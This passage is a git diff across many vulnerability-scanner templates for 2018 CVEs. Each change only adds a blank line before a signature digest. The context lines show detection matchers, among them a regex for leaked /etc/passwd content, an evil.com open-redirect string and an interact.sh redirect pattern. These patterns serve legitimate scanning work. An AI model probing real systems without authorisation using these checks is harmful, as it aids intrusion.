490a004630440220119e535e1c6280ce228aabaaac6ebb80a95ee91300bfd92b932197380a3a57e90220420895549398a5b53c3e3d026f80354f5d4e9abd4345468495ea3cfa19904397:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-16668.yaml b/http/cves/2018/CVE-2018-16668.yaml index a4097e8b81..fa25fc113f 100644 --- a/http/cves/2018/CVE-2018-16668.yaml +++ b/http/cves/2018/CVE-2018-16668.yaml @@ -44,4 +44,5 @@ http: - "** Platform sources **" - "** Application sources **" condition: and -# digest: 4b0a00483046022100922ed28bb5cb5a9f2f32e49feac7d517dd0a77ac0c9c8ecfc3300615183ca47d022100caf20eafa0a239f6cd16217f924fbea0960e0cfb960e0e598954de88e631af42:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100922ed28bb5cb5a9f2f32e49feac7d517dd0a77ac0c9c8ecfc3300615183ca47d022100caf20eafa0a239f6cd16217f924fbea0960e0cfb960e0e598954de88e631af42:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-16670.yaml b/http/cves/2018/CVE-2018-16670.yaml index e28960e6dd..91b1b18f39 100644 --- a/http/cves/2018/CVE-2018-16670.yaml +++ b/http/cves/2018/CVE-2018-16670.yaml @@ -44,4 +44,5 @@ http: - "" - "Reader.STATUS" condition: and -# digest: 490a004630440220008dfb9d875b53d0778dd5c1b9d955370fe277a9fbc698fdb34430b18e6171e9022072260d0738b44d4084ea5bfcd2a70f91687a00491624f2ca1006e34f88d56735:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a004630440220008dfb9d875b53d0778dd5c1b9d955370fe277a9fbc698fdb34430b18e6171e9022072260d0738b44d4084ea5bfcd2a70f91687a00491624f2ca1006e34f88d56735:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-16671.yaml b/http/cves/2018/CVE-2018-16671.yaml index 050a67ef51..861f5450bd 100644 --- a/http/cves/2018/CVE-2018-16671.yaml +++ b/http/cves/2018/CVE-2018-16671.yaml @@ -46,4 +46,5 @@ http: part: body regex: - "(19|20)\\d\\d[- /.](0[1-9]|1[012])[- /.](0[1-9]|[12][0-9]|3[01])" -# digest: 490a0046304402200096080cbc80b4caf6c2e29735596b55416565675fb448fe70553c72508f1b38022043646b67eda254a812bec4ec43d8c45191bea3eefa7e944a996d6c6d55bb5687:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a0046304402200096080cbc80b4caf6c2e29735596b55416565675fb448fe70553c72508f1b38022043646b67eda254a812bec4ec43d8c45191bea3eefa7e944a996d6c6d55bb5687:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-16716.yaml b/http/cves/2018/CVE-2018-16716.yaml index e1216d2190..93aca780c7 100644 --- a/http/cves/2018/CVE-2018-16716.yaml +++ b/http/cves/2018/CVE-2018-16716.yaml @@ -38,4 +38,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022061da37ff7ccd3a821803ffb4b06b238970b9f495975cb683da957fd9a92c6f7902210087716b3b1e607501b0e5eff4272fb568e38ea3a84b2496eda5c18c311fe351f5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022061da37ff7ccd3a821803ffb4b06b238970b9f495975cb683da957fd9a92c6f7902210087716b3b1e607501b0e5eff4272fb568e38ea3a84b2496eda5c18c311fe351f5:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-16761.yaml b/http/cves/2018/CVE-2018-16761.yaml index bfc1590cb9..0d5c590921 100644 --- a/http/cves/2018/CVE-2018-16761.yaml +++ b/http/cves/2018/CVE-2018-16761.yaml @@ -38,4 +38,5 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 -# digest: 4b0a00483046022100c3f9beee6ddcf86547fd81d075c79b10d0eb6c29863d93f06350c055ef39c372022100d70f9d601d9c30050e24e6fba6df88ccd5fd58dd104d6569a2fc7e068be6a02e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100c3f9beee6ddcf86547fd81d075c79b10d0eb6c29863d93f06350c055ef39c372022100d70f9d601d9c30050e24e6fba6df88ccd5fd58dd104d6569a2fc7e068be6a02e:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-16763.yaml b/http/cves/2018/CVE-2018-16763.yaml index 4504e8242f..29c1389ecb 100644 --- a/http/cves/2018/CVE-2018-16763.yaml +++ b/http/cves/2018/CVE-2018-16763.yaml @@ -42,4 +42,5 @@ http: - type: status status: - 200 -# digest: 4b0a004830460221008d62718378a1aa78e717e0a18970bbc5c8e5f1bb7daa116b5c474a04cf716f76022100dbb60625c9aeb39a41b6e7e6d253dbb83cf0e32bade2058d1f435d17c1cd79a5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a004830460221008d62718378a1aa78e717e0a18970bbc5c8e5f1bb7daa116b5c474a04cf716f76022100dbb60625c9aeb39a41b6e7e6d253dbb83cf0e32bade2058d1f435d17c1cd79a5:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-16836.yaml b/http/cves/2018/CVE-2018-16836.yaml index 1e642a1f48..1d963b6e54 100644 --- a/http/cves/2018/CVE-2018-16836.yaml +++ b/http/cves/2018/CVE-2018-16836.yaml @@ -40,4 +40,5 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502203d5f4d1f4d5bdfe9bf8e78d12e49c38515b2c3cc76d8cbcdab1572e0ddef9935022100d7690eaf3538c1eaecb3c61a34e7b24221cae2db6254eb8c4e582768d29ff03c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a0047304502203d5f4d1f4d5bdfe9bf8e78d12e49c38515b2c3cc76d8cbcdab1572e0ddef9935022100d7690eaf3538c1eaecb3c61a34e7b24221cae2db6254eb8c4e582768d29ff03c:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-16979.yaml b/http/cves/2018/CVE-2018-16979.yaml index d312f6a8a3..e9b27d8d17 100644 --- a/http/cves/2018/CVE-2018-16979.yaml +++ b/http/cves/2018/CVE-2018-16979.yaml @@ -43,4 +43,5 @@ http: - type: status status: - 200 -# digest: 490a004630440220368834e3bc2de26bde754e2cdfea66833d2ccd609b4f86169b640ac768b1f4af022009197497822b98603a15ca70ffaa8fa2c9fba7e72bd53858b051e1d5d2b3e7c7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a004630440220368834e3bc2de26bde754e2cdfea66833d2ccd609b4f86169b640ac768b1f4af022009197497822b98603a15ca70ffaa8fa2c9fba7e72bd53858b051e1d5d2b3e7c7:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-17246.yaml b/http/cves/2018/CVE-2018-17246.yaml index f9c7f2c59d..96f9c3d3a2 100644 --- a/http/cves/2018/CVE-2018-17246.yaml +++ b/http/cves/2018/CVE-2018-17246.yaml @@ -51,4 +51,5 @@ http: part: header words: - "application/json" -# digest: 490a004630440220660b5344080135a2d3b64bdd578de06b3c22bac1bf0888e9893cff7fc1dcb4e302205e98082ea1f6823ad534fe12233dbaa9150eb313d6152cb987d764050e9d1746:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a004630440220660b5344080135a2d3b64bdd578de06b3c22bac1bf0888e9893cff7fc1dcb4e302205e98082ea1f6823ad534fe12233dbaa9150eb313d6152cb987d764050e9d1746:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-17422.yaml b/http/cves/2018/CVE-2018-17422.yaml index 09783928f2..e022ed5aca 100644 --- a/http/cves/2018/CVE-2018-17422.yaml +++ b/http/cves/2018/CVE-2018-17422.yaml @@ -40,4 +40,5 @@ http: words: - "self.location = 'http://evil.com'" - "location.href = 'http\\x3a\\x2f\\x2fwww\\x2eevil\\x2ecom'" -# digest: 4a0a00473045022100d66cae3fa44435652939d7cbbda975af247f4d7c44841a191506c7058c777020022067540697873d9a553320cacc037cee90daf39b09a5d4d2bc52433a243bd10f72:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100d66cae3fa44435652939d7cbbda975af247f4d7c44841a191506c7058c777020022067540697873d9a553320cacc037cee90daf39b09a5d4d2bc52433a243bd10f72:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-17431.yaml b/http/cves/2018/CVE-2018-17431.yaml index 5c51279b8e..890adf15f5 100644 --- a/http/cves/2018/CVE-2018-17431.yaml +++ b/http/cves/2018/CVE-2018-17431.yaml @@ -48,4 +48,5 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100a234aaa4edfb7e4f962e5da0cac16975a1a12d3c67b9075407aab9b2972c7b67022100bec0059a78c9c54658ab51390f62dea673f23b8ae7ccd6f2487ebbea343f2330:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100a234aaa4edfb7e4f962e5da0cac16975a1a12d3c67b9075407aab9b2972c7b67022100bec0059a78c9c54658ab51390f62dea673f23b8ae7ccd6f2487ebbea343f2330:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-18069.yaml b/http/cves/2018/CVE-2018-18069.yaml index 2a05c00643..fa21526928 100644 --- a/http/cves/2018/CVE-2018-18069.yaml +++ b/http/cves/2018/CVE-2018-18069.yaml @@ -41,4 +41,5 @@ http: - 'contains(set_cookie, "_icl_current_admin_language")' - 'contains(body, "\">")' condition: and -# digest: 4b0a004830460221008ff08800163d45fb3f331582080a20218d9b511e6390154538afb8899d87a2740221008dd65d52999070390c2d180853a7c123fbfaaca5b402f330cbb1c80d44b69047:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a004830460221008ff08800163d45fb3f331582080a20218d9b511e6390154538afb8899d87a2740221008dd65d52999070390c2d180853a7c123fbfaaca5b402f330cbb1c80d44b69047:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-18570.yaml b/http/cves/2018/CVE-2018-18570.yaml index f90540f356..4ddc3386c4 100644 --- a/http/cves/2018/CVE-2018-18570.yaml +++ b/http/cves/2018/CVE-2018-18570.yaml @@ -44,4 +44,5 @@ http: - type: status status: - 200 -# digest: 490a004630440220727b0a90e213839fb957817bab2faeb92b92657a280c8641bb1f0d0faead0849022003bfcf038a80e00ea13fe7f8763a4d9db2c0adc0eb3a69195653e0b2eb42438c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a004630440220727b0a90e213839fb957817bab2faeb92b92657a280c8641bb1f0d0faead0849022003bfcf038a80e00ea13fe7f8763a4d9db2c0adc0eb3a69195653e0b2eb42438c:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-18608.yaml b/http/cves/2018/CVE-2018-18608.yaml index d426190e57..a4e287f3b7 100644 --- a/http/cves/2018/CVE-2018-18608.yaml +++ b/http/cves/2018/CVE-2018-18608.yaml @@ -50,4 +50,5 @@ http: - type: status status: - 200 -# digest: 490a0046304402202d10eac19a7c38a9b6dfc4248dc2f361af92ee49a7e5ff907b2fe30ea21c733c02202df7e835b6f59289fef9c73f58e8fbddbd1bbaee84ec6cf46d63d0dad5e89b6a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a0046304402202d10eac19a7c38a9b6dfc4248dc2f361af92ee49a7e5ff907b2fe30ea21c733c02202df7e835b6f59289fef9c73f58e8fbddbd1bbaee84ec6cf46d63d0dad5e89b6a:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-18775.yaml b/http/cves/2018/CVE-2018-18775.yaml index be8715f09d..be8fedfef4 100644 --- a/http/cves/2018/CVE-2018-18775.yaml +++ b/http/cves/2018/CVE-2018-18775.yaml @@ -45,4 +45,5 @@ http: - type: status status: - 200 -# digest: 490a00463044022031bcf8d5518fc9ca9efb6917f81b0c7cecb661feee53fb07af0f4779769d307b02207a72448fa78ec7804e6fe0ad84229d0f343743372e3d12add80f04e0892ccf37:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a00463044022031bcf8d5518fc9ca9efb6917f81b0c7cecb661feee53fb07af0f4779769d307b02207a72448fa78ec7804e6fe0ad84229d0f343743372e3d12add80f04e0892ccf37:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-18777.yaml b/http/cves/2018/CVE-2018-18777.yaml index eeae74c23d..fb26c6d664 100644 --- a/http/cves/2018/CVE-2018-18777.yaml +++ b/http/cves/2018/CVE-2018-18777.yaml @@ -40,4 +40,5 @@ http: - type: status status: - 200 -# digest: 490a00463044022034c03a5792139b2c5ae9cb72c5812c9f4e22c714045c61c896a98ccdfb5d5604022017f366a4b5516713ad032b649abd57aa08f78d8a948c9e2b5f5e891d41e20222:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a00463044022034c03a5792139b2c5ae9cb72c5812c9f4e22c714045c61c896a98ccdfb5d5604022017f366a4b5516713ad032b649abd57aa08f78d8a948c9e2b5f5e891d41e20222:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-18809.yaml b/http/cves/2018/CVE-2018-18809.yaml index e32319085f..ae034d518d 100644 --- a/http/cves/2018/CVE-2018-18809.yaml +++ b/http/cves/2018/CVE-2018-18809.yaml @@ -47,4 +47,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022033c2a71ae30d4bf7ddc36a29892293cf7b4dc675ad58ff97cc43665702f191e9022100f543bafd93204d7d74f9564ed3c14d389183d991c1d5cb75fbd6678bb4c033ce:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022033c2a71ae30d4bf7ddc36a29892293cf7b4dc675ad58ff97cc43665702f191e9022100f543bafd93204d7d74f9564ed3c14d389183d991c1d5cb75fbd6678bb4c033ce:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-18925.yaml b/http/cves/2018/CVE-2018-18925.yaml index 0736c1736c..add7452891 100644 --- a/http/cves/2018/CVE-2018-18925.yaml +++ b/http/cves/2018/CVE-2018-18925.yaml @@ -41,4 +41,5 @@ http: - type: dsl dsl: - 'status_code_1 == 500 && status_code_2 == 200 && contains(body_2, "")' -# digest: 4a0a0047304502207ca3b97fac4c3d9df7c3f5f0079161ba5f2526754642e9ca477c7ba97f54bbc4022100fd29bf3e711ec77ee3e7d80e1c491c05732c7b06011e7c1eaf1688b7df3d6b46:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a0047304502207ca3b97fac4c3d9df7c3f5f0079161ba5f2526754642e9ca477c7ba97f54bbc4022100fd29bf3e711ec77ee3e7d80e1c491c05732c7b06011e7c1eaf1688b7df3d6b46:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-19136.yaml b/http/cves/2018/CVE-2018-19136.yaml index d965b5ae82..d807915818 100644 --- a/http/cves/2018/CVE-2018-19136.yaml +++ b/http/cves/2018/CVE-2018-19136.yaml @@ -56,4 +56,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100901ed17ca5cf678f7fe5127d6f24b66babda2754d30e75fb44d332278bb042e302205b927ca5920c681396a898f15456f6c77924ae98c51a96b1222993ddf9e4bc19:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100901ed17ca5cf678f7fe5127d6f24b66babda2754d30e75fb44d332278bb042e302205b927ca5920c681396a898f15456f6c77924ae98c51a96b1222993ddf9e4bc19:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-19137.yaml b/http/cves/2018/CVE-2018-19137.yaml index a96e8256d6..b1e9f67253 100644 --- a/http/cves/2018/CVE-2018-19137.yaml +++ b/http/cves/2018/CVE-2018-19137.yaml @@ -55,4 +55,5 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220559427a96a82351333b019e41c9ebdb5b28f5b50882dba28a482d28827fcb6e4022100d507e2b7be3cb5ea54a38110e0a408d5f95a5b41ced78a2cdc6236be1b789414:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a004730450220559427a96a82351333b019e41c9ebdb5b28f5b50882dba28a482d28827fcb6e4022100d507e2b7be3cb5ea54a38110e0a408d5f95a5b41ced78a2cdc6236be1b789414:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-19287.yaml b/http/cves/2018/CVE-2018-19287.yaml index 34cfd27c40..9550c5acad 100644 --- a/http/cves/2018/CVE-2018-19287.yaml +++ b/http/cves/2018/CVE-2018-19287.yaml @@ -60,4 +60,5 @@ http: - type: status status: - 200 -# digest: 4a0a004730450221008f99903d6ce40c3d78677fa538664318c302469a74aed86cd47e624ecc969ed002207063fd4443f5becac73d62d1c3f65cc81d6f164336f868a4c08ebbfd8c186614:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a004730450221008f99903d6ce40c3d78677fa538664318c302469a74aed86cd47e624ecc969ed002207063fd4443f5becac73d62d1c3f65cc81d6f164336f868a4c08ebbfd8c186614:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-19326.yaml b/http/cves/2018/CVE-2018-19326.yaml index cabfdcaa6d..9a84cac459 100644 --- a/http/cves/2018/CVE-2018-19326.yaml +++ b/http/cves/2018/CVE-2018-19326.yaml @@ -46,4 +46,5 @@ http: part: body regex: - "root:.*:0:0:" -# digest: 490a0046304402205b44e6064026cc4cd075c88485354dee541f02c6c4bc313a47783350a859322c022071fadb7989b18f94fdc0c614b7f827a67b3ffa32651fa02bb14a4add8a49235b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a0046304402205b44e6064026cc4cd075c88485354dee541f02c6c4bc313a47783350a859322c022071fadb7989b18f94fdc0c614b7f827a67b3ffa32651fa02bb14a4add8a49235b:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-19365.yaml b/http/cves/2018/CVE-2018-19365.yaml index a452e1c8e0..69ad1c60a6 100644 --- a/http/cves/2018/CVE-2018-19365.yaml +++ b/http/cves/2018/CVE-2018-19365.yaml @@ -40,4 +40,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100a7c6c0608bab92686113c563bc4cb7e6456cbd97c49d72fc8c943f83d2a5546e022077e4c508476dfa2bffbe7a9af8bfa84d24d16f1a64654c2e98d754a3a2aade3e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100a7c6c0608bab92686113c563bc4cb7e6456cbd97c49d72fc8c943f83d2a5546e022077e4c508476dfa2bffbe7a9af8bfa84d24d16f1a64654c2e98d754a3a2aade3e:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-19386.yaml b/http/cves/2018/CVE-2018-19386.yaml index e595c31486..2b05991c09 100644 --- a/http/cves/2018/CVE-2018-19386.yaml +++ b/http/cves/2018/CVE-2018-19386.yaml @@ -39,4 +39,5 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100e966bafae386f4d4d91380d70700b73e61a6543f0e16ad7500c77c1dceafe2f5022100c09ca764f41be4eb73e76ec1228e0190f04b7a367174b365d211cb7c03089e22:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100e966bafae386f4d4d91380d70700b73e61a6543f0e16ad7500c77c1dceafe2f5022100c09ca764f41be4eb73e76ec1228e0190f04b7a367174b365d211cb7c03089e22:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-19439.yaml b/http/cves/2018/CVE-2018-19439.yaml index 332b4fc8f2..81539a1432 100644 --- a/http/cves/2018/CVE-2018-19439.yaml +++ b/http/cves/2018/CVE-2018-19439.yaml @@ -34,4 +34,5 @@ http: part: body words: - "